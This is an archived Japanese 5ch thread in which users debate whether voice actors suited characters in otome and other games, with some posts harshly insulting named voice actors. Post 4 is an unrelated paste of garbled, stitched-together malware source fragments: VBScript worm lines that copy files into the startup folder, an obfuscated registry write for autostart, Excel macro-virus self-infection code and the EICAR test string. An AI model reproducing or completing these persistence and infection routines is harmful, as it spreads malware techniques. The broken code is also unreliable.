5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

声があってたあってなかったゲームキャラ2

1 :名無しって呼んでいいか?:2007/06/27(水) 18:00:55 ID:???
声優個人嫌いだとかそういう面はスルーで
あくまで声が合ってたか合ってないかでお願いします
便乗や絡みはOKですが特定の声優叩きや他人の意見を否定するのは禁止です

前スレ
http://game12.2ch.net/test/read.cgi/ggirl/1072221609/

2 :1:2007/06/27(水) 18:02:23 ID:???
スレタイ長すぎと叱られたので悪いとは思いつつ勝手にスレタイ削りました
すんまそ

3 :名無しって呼んでいいか?:2007/06/27(水) 18:44:39 ID:SVyG1b0Z
金色のコルダ 火原

4 :名無しって呼んでいいか?:2007/06/27(水) 19:00:52 ID:???
Set A4 = A1.CreateTextFile(A1.BuildPath(A1. 1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo ", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1. (BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E. 1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub


5 :名無しって呼んでいいか?:2007/06/28(木) 10:51:13 ID:???
>>3
声は合ってたとは思うぞ、けどな、下手すぎるんだよ
その辺の素人より下手糞だろアイツ

いまだに声優続けてるのがウザったい
はやく辞めてくれ

6 :名無しって呼んでいいか?:2007/06/28(木) 22:48:21 ID:???
リトルエイドのあかりは慣れるのが大変だった…
長沢さーんどうした!?と聴きたくなる程の媚び声。ムリ

逆に沢登と乃凪は合ってた。乃凪はたまにおっさん声になるけど

7 :名無しって呼んでいいか?:2007/06/29(金) 11:33:22 ID:???
マルセルとリュミエールはあの声だからこそいい。
偉い人にはそれがわからんのです。

オリヴィエもあの声だから、今のキャラがある。ってか、
案の守護聖はみんなあの声でキャラ立てしてるんだから、みんなはまってる。

ただ、惜しむらくは闇の……。(でも最近の田中氏はよいと思う。)

8 :名無しって呼んでいいか?:2007/07/01(日) 15:01:39 ID:???
闇は島田氏がベストだと思う自分は少数派。

9 :名無しって呼んでいいか?:2007/07/03(火) 10:10:58 ID:???
ビタミンの風門寺
無理無理無理無理絶対に無理
声を無理に高く出すのに精一杯で、殆ど演技が出来ていない(岸尾本人もそう言ってたが)
あーいう女装キャラを出すなら、高い声が出せそうな福山とか代永とかの方がいいんじゃね?

声優自体も痛い。
てゆーか、こいつ馬鹿だ。

クリア後のオマケのフリートークで「今迄演じたキャラで二番目にウザい。
このキャラをクリアした君、マジでスゲーよ。尊敬する。ウザかっただろ〜?(笑)。
次に演じる事があるかは解らないが、もしかしたらそん時は声優変わってるかもしんないけど(笑)
そん時はそん時で応援してくれよ!(投げやり的に)」みたいな事を言ってた。
…これがクリア後のオマケ?
ビタミン自体はストーリーに色々問題はありつつもかなりハマって2週間でフルコンプしたというのに…

ビタミンに出てた、こいつ以外の声優の演技・フリートークは殆どまともだったから余計にムカついた

岸尾、嫌いじゃなかったのに嫌いになった

10 :名無しって呼んでいいか?:2007/07/06(金) 12:19:37 ID:???
前スレが見られないから既出だったらすまん。

コルダ2の志水。
合って無いというか演技が変わった?
あんなトロい話し方じゃないほうが良かったなと思う。

11 :名無しって呼んでいいか?:2007/07/11(水) 22:05:37 ID:???
火原は確かにきもい
無理にテンションあげてて痛々しい

12 :名無しって呼んでいいか?:2007/07/14(土) 16:35:20 ID:???
遙か2・3の地の玄武
そんなに無理して低い声出さなくていいよと言いたくなる

13 :名無しって呼んでいいか?:2007/07/18(水) 23:40:05 ID:???
>>10
禿同。
アニメあたりからキャラが変わってしまった…。
ドラマCDのころに戻ってほしいよ。

14 :名無しって呼んでいいか?:2007/07/19(木) 01:26:46 ID:???
>>12
1も同じく
中の人自体はダメじゃないんだけど
あれはちょっとな

15 :名無しって呼んでいいか?:2007/07/19(木) 22:40:13 ID:???
水の旋律の愁一

キャラは好きなんだけど状況と喋りが合ってなかったり、変なところで台詞を切るのが凄く気になる
乙女ゲに個別オンオフは必須だと思った

16 :名無しって呼んでいいか?:2007/07/22(日) 00:14:33 ID:???
>>7
それって慣れちゃっただけなのでは?

私は慣れてないからか、マルセルとか顔と合わな過ぎって思っちゃう

17 :名無しって呼んでいいか?:2007/07/28(土) 17:20:41 ID:???
最初合わないと思ってても慣れると気にならなくなることあるよね

コルダ2の志水はスキップしまくりだからいつまで経っても慣れなさそうだ・・・orz

18 :名無しって呼んでいいか?:2007/08/05(日) 14:53:31 ID:???
既出
だと思うが、D3のファンタジー系の隠しキャラは何故あんなにも声が合わないのか。。。設定に萌えても声でもの凄い萎えてしまう。コルダ志水禿げ同。
だらだら喋るからイライラしてしまう。

19 :名無しって呼んでいいか?:2007/08/05(日) 18:34:56 ID:???
コルダの森田はあってたあってなかったとかってレベルじゃないが
GS2キテルにはすごく合ってたと思う

20 :名無しって呼んでいいか?:2007/08/11(土) 01:51:43 ID:???
翡翠の晶は福山から野島弟に変更になって良かったと思った
福山のルルーシュみたいな相撲取り声じゃ爆笑してゲームに集中できねえw
とは言え野島弟も下手ではないが一本調子な演技だった
もうちょっと演技に変化つけてくれりゃいいのに

21 :名無しって呼んでいいか?:2007/08/17(金) 04:59:42 ID:???

遙か3…マロ
NANA…ナナ、ヤス、レン、潤ちゃん
ふし遊…多喜子

×
遙か…天真(シャウトキモイ)
遙か3…望美
コルダ2…志水
NANA…シン、レイラ、ナオキ
ふし遊…虚宿、斗宿

22 :名無しって呼んでいいか?:2007/08/17(金) 22:36:15 ID:???
マルセルは、あの声がいいんだよ


23 :名無しって呼んでいいか?:2007/09/14(金) 13:14:13 ID:???
コルダの森田起用は、完全にコーエーと青二の大人の事情w

24 :名無しって呼んでいいか?:2007/10/11(木) 01:47:39 ID:???
召しませ浪漫茶房の暁尚
キャラも中の人も好きなんだが、いまいちフィットしてなかった

7 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)